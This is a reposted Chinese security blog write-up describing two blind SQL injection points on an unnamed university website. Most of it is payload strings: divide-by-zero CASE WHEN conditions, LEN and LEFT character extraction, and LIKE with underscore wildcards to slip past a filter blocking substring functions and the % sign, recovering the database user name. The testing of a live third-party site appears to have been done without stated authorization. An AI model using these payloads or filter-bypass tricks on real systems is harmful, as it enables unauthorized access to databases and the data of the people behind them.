某大学两处SQL注入

admin 2022年3月9日21:59:27评论68 views字数 1565阅读5分13秒阅读模式


△△△点击上方“蓝字”关注我们了解更多精彩




0x00 前言

本文来自蜡笔没有小新师傅的投稿,感谢师傅的投稿,同时也欢迎各位师傅来投稿!



0x01 SQL注入简介
本人偷个懒,请各位大佬移步
https://www.cnblogs.com/myseries/p/10821372.html





0x02 第一处SQL注入点
开始基本轮子构造
and+1/1=1

某大学两处SQL注入


and+1/0=1

某大学两处SQL注入

发现如果使用if语句,无论对错返回的字节都是一样的:

and+1/ if (1=1,1,0)=1


某大学两处SQL注入

改用case when,成功:

and+1/case+when+1=1+then+1+else+0+end=1

某大学两处SQL注入

and+1/case+when+1=0+then+1+else+0+end=1

某大学两处SQL注入

 判断想要获取内容的个数,这里是user:

and+1/case+when+len(user)=3+then+1+else+0+end=1

某大学两处SQL注入

使用截取函数,发现substr三兄弟以及mid全都不能用。但是leftright可以,这里用left:

and+1/case+when+left(‘abc’,1)=’a’+then+1+else+0+end=1

某大学两处SQL注入

现在爆破用户名user,因为使用的是left截取函数,所以只能一个一个爆破,所幸只有3位:

  第一位:

and+1/case+when+left(user,1)=’b’+then+1/1+else+1/0+end=1

某大学两处SQL注入

  第二位:

and+1/case+when+left(user,2)=’db’+then+1/1+else+1/0+end=1

某大学两处SQL注入

  第三位:

and+1/case+when+left(user,3)=’dbo’+then+1/1+else+1/0+end=1

某大学两处SQL注入

完成。





0x03 第二处SQL注入

在同一网站的另一处也存在sql注入,前面的poc构造都一样。

and+1/case+when+1=1+then+1+else+0+end=1

某大学两处SQL注入

and+1/case+when+1=0+then+1+else+0+end=1

某大学两处SQL注入

但不同的是这里拦截了所有的截取函数,所以使用like:

and+1/case+when+’ab’+like+’ab’+then+1+else+0+end=1

某大学两处SQL注入

本来想like%配合使用。但发现竟然不行,应该是和%和字母组合会触发拦截。

and+1/case+when+’ab’+like+’ab’+then+1+else+0+end=1

某大学两处SQL注入

不过所幸_没被拦截(_仅替代一个字符 ):

and+1/case+when+’ab’+like+’a_’+then+1+else+0+end=1

某大学两处SQL注入

接下来必须得判断user的位数,但是len()函数被拦截了,只能盲猜,想到既然是同一网站或许会是同一用户名,那就也是3位:

and+1/case+when+’ab’+like+’___’+then+1+else+0+end=1

某大学两处SQL注入

果然是3位,现在就可以挨个爆破了:

  第一位:

and+1/case+when+’ab’+like+’a__’+then+1+else+0+end=1

某大学两处SQL注入

   第二位:

and+1/case+when+’ab’+like+’db_’+then+1+else+0+end=1
某大学两处SQL注入    第三位:
and+1/case+when+’ab’+like+’dbo’+then+1+else+0+end=1
某大学两处SQL注入完成。




0x04 总结

祝各位师傅在2021年挖洞挖到手软!

本文仅做技术分享,切勿用于非法用途!

如有违反,于本文无关!




END



如您有任何问题、建议、需求请后台留言NOVASEC公众号!


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


某大学两处SQL注入


如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。



本文始发于微信公众号(NOVASEC):某大学两处SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月9日21:59:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某大学两处SQL注入http://cn-sec.com/archives/494496.html

发表评论

匿名网友 填写信息